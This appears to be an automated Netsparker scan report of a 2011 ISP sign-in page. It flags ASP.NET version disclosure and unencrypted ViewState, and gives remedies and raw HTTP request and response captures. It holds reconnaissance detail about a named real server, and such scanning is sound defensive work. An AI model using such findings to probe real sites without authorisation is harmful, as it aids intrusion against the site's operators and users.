<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
ASP.NET Version Disclosure
ASP.NET Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from
X-AspNet-Version banner of HTTP response or default ASP.NET error page.
Impact
An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.
Remedy
Apply the following changes on your
web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.
<System.Web>
< httpRuntime enableVersionHeader="false" />
<customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
<error statusCode="403" redirect="~/error/Forbidden.aspx" />
<error statusCode="404" redirect="~/error/PageNotFound.aspx" />
<error statusCode="500" redirect="~/error/InternalError.aspx" />
</customErrors>
</System.Web>
Remedy References
|
- /authentication.aspx
/authentication.aspx |
Extracted Version
X-AspNet-Version: 2.0.50727
Request
GET /authentication.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
ViewState is not Encrypted
ViewState is not Encrypted
1
TOTAL
LOW
Netsparker identified that the target web application doesn't use encryption on ViewState data.
Impact
An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.
Remedy
ASP.NET provides encryption for ViewState parameters.
For page based protection, place the following directive at the top of affected page.
For page based protection, place the following directive at the top of affected page.
<%@Page ViewStateEncryptionMode="Always" %>You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.
<System.Web> <pages viewStateEncryptionMode="Always"> </System.Web>
Remedy References
|
- /authentication.aspx
/authentication.aspx |
ViewState Version
.NET Framework 2.x
Request
GET /authentication.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
